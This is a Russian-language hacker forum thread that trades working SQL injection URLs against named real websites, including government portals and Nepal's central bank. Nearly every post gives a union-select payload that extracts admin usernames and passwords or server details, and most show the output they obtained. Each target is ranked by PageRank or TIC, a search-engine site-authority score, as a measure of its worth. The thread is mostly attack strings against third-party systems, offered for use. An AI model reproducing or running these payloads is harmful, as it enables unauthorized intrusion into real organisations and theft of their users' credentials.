SQL Инъекции

http://www.channel5belize.com/archive_detail_story.php?story_id=-19702+union+select+1,2,3,4,5,6,group_concat(username,char(58),password)+from+admin_login--+

PR-6
-------
http://www.mmegi.bw/index.php?sid=1&aid=1'+or(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+&dir=2008/October/Wednesday8

http://www.mmegi.bw/phpinfo.php ))

PR-6

 

Code:

http://www.ksda.[b]gov[/b]/open_records/id/1+or+1=(select+top+1+@@version+from+information_schema.tables)--+

Version: Microsoft SQL Server 2000 - 8.00.2055
Platform : Intel X86
OS: Windows NT 5.2 (Build 3790: Service Pack 2)

PR — 6

Code:

http://house.legis.state.la.us/H_Reps/members.asp?ID=-1+union+select+null,null,null,null,null,null,null,null,111,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+MSysAccessObjects

Version: Access 1997

PR — 5

 

http://www.bashkiakorce.gov.al/frontend/articles.php?cid=-144+union+select+1,2,3,4,version()--+

 

http://www.rockreport.be/review.asp?id=1414+union+select+1+--+
яндекс тиц 10
яндекс RANK 2/6
Google PageRank 4/10

 

Code:

http://www.privacycorps.com/products/?id=-1+union+select+1,2,3,unhex(hex(concat_ws(char(58),version(),user(),database(),@@version_compile_os))),5,6,7,8,9,0,1,2,3--+

Version: 4.1.11-Debian_etch1-log
User: [email protected]
Database: privacycorps
OS: pc-linux-gnu

PR - 5

Code:

http://www.panicandaction.com/artists.php?id=-1+union+select+1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,0,1,2--+

Version: 5.0.41
User: [email protected]
Database: panicandaction_com
OS: pc-linux-gnu

PR - 3

Code:

http://www.mussonjamaica.com/about_web.php?id=-1'+union+select+1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4--+

Version: 5.0.45-community-nt
User: pdbuser@localhost
Database: mussonjamaica_webdb
OS: Win32

PR - 4

Code:

http://www.wingate.ru/products.php?todo=view&id=-1+union+select+1,2,3,concat_ws(char(58),version(),user(),database(),@@version_compile_os),5,6,7,8,9,0--+

Version: 5.0.45
User: anysoft1_wing@localhost
Database: anysoft1_wing
OS: redhat-linux-gnu

тИЦ - 150
PR - 3

Code:

http://dendymaster.ru/index.php?pages=catalog&id=-1+union+select+1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,0--+

Version: 4.1.25-log
User: dendymas@localhost
Database: wwwdendymasterru
OS: portbld-freebsd6.2

тИЦ - 30
PR - 3

 

http://ironmiketyson.ru/article_read.php?id=1+gunion+select+1,2,3,4+--+

 

Калининград

http://www.kaliningrad.yabloko.ru/news/index.phtml?id=-251+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--

version : 5.0.51a-24+lenny4-log
user : kaliningrad@localhost
database : kaliningrad
os : debian-linux-gnu

 

Code:

http://www.adyashanti.org/index.php?file=writings_inner&writingid=-35+union+select+1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5,6--+

Version: 5.0.91-community
User: adyash2_ogs@localhost
Database: adyash2_ogs
OS: pc-linux-gnu

PR - 4

 

sdelanovspb.ru PR-5 ТИЦ-30

Code:

http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,4,5+--+

Code:

5.1.39-log:sdelanov@localhost:sdelanov

ndl-global.com PR-5 ТИЦ-190

Code:

http://ndl-global.com/print.php?news=-92+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,4,5+--+

Code:

5.0.88-log:[email protected]:ndlprofy_test

 

to nemaniak

sdelanovspb.ru PR-5 ТИЦ-30

Code:

http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,cast%28concat%28table_name,0x3a,column_name%29%20as%20binary%29,4,5+from+information_schema.columns+where+column_name+like+0x257061737325--

Итог:

Code:

http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat%28user_login,0x3a,user_pass%29,4,5+from+uw_users--

Траблы с админкой, две админки!


ndl-global.com PR-5 ТИЦ-190

Code:

http://ndl-global.com/print.php?news=-92+union+select+1,2,cast%28concat%28table_name,0x3a,column_name%29%20as%20binary%29,4,5+from+information_schema.columns+where+column_name+like+0x257061737325--

Итог:

Code:

http://ndl-global.com/print.php?news=-92+union+select+1,2,concat%28user_login,0x3a,user_pass%29,4,5+from+uw_users--

С админкой тоже самое, один и тотже сервак

 

Code:

http://www.rosconcert.com/common/arc/story.php?id_cr=-56+UNION+SELECT+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20from%20users--&id=19929

Username: [email protected]
Version: 5.0.77
Database: cmn

Google PR:4 Тиц: 350


Баян конечно, но чтото можно вытащить нужное.

Code:

http://www.fc-dynamospb.ru/list.php?id=-15+UNION+SELECT+1,2,3,cast%28concat%28table_name,0x3a,column_name%29%20as%20binary%29+from+information_schema.columns--

запрос к базе:

from newusers_2

Joomla! 1.5 - Open Source Content Management

Code:

http://www.ijoomla.com/index.php?option=com_ijoomla_archive&act=getall&task=archive&ptitle=iJoomla%20Magazine&sectionid=-4+UNION+SELECT+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--

Username: ijoomla_udevxt@localhost
Version: 5.0.91-community
Database: ijoomla_dijooverx

Google PR: 7

 

http://www.burs.org.bw/index.php?option=com_vat&id=-38+union+select+1,2,3,4,5,6,7,group_concat(username,char(58),password),9,10,11+from+jos_users

 

Центрального банка Непала

Центрального банка Непала
nrb.org.np

Code:

http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,username,password,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+user_validate+limit+4,1+--+

http://nrb.org.np/login/login.php
.....
Konqi : пассы нельзя выложить

http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,bank_code,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+lcuseraccounts+--+



ТИЦ: 50 PR: 6

 

Департамент труда и профессиональной подготовки Ливии

MSSQL

Code:

http://www.smpt.[b]gov[/b].ly/ViewNews.aspx?id=-221+union+all+select+'1',username,'3',password,'5','6',null,'8','9'+from+users#

PR - 5

пароли очень старательно придумывали

 

ТИЦ 80 PR 7
http://www.nativeweb.org/resources.php?type=1+union+select+1,2,concat_ws(0x3a, password,loginname),4,5, 6,7+from+users--

 

PR 3/10
ТИЦ 10

http://www.razwod.ru/index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,version%28%29,User%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35 ,36,37,38+--+

 

https://stat.net.kht.ru/result/stat.pl?action=calc&stat_login=***'+order+by+1--

'PostgreSQL 8.1.21 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.6:ViewUser:kray'

Может у кого и не откроется т.к это сайт статистики компании Дальсвязь
Я дальше копать не буду=)
Завтра напишу им о ошибке т.к наследил в логах как слон(((

 

PR - 1

Code:

http://realmebel63.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

Code:

http://ulma-c.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

Code:

http://www.euro-com.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

Code:

http://cleanwin.org/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

Code:

http://classtv.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

Code:

http://www.sentimat.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

PR - 2

Code:

http://alvitek.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

PR - 3

Code:

http://gsdk9.com.ua/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

Code:

http://www.medvedi-pc.ru/index.php?option=com_djcatalog&view=show&search=%27+and+0+union+select+1,2,3,username,5,password,7,8,9,1  0,11+from+%23__users%23

 

ТИЦ10YC(R2) PR3

ТИЦ10(R2)

ТИЦ 200

PR1

ТИЦ10(R2) PR1

PR1

PR3

PR2

PR2

ТИЦ30(R3) PR3 AR9439063

ТИЦ10(R2) PR4

PR2

ТИЦ10(R2) PR2 AR19886775

 

проверьте скули антибоян-oм прежде чем постить, это касается всех!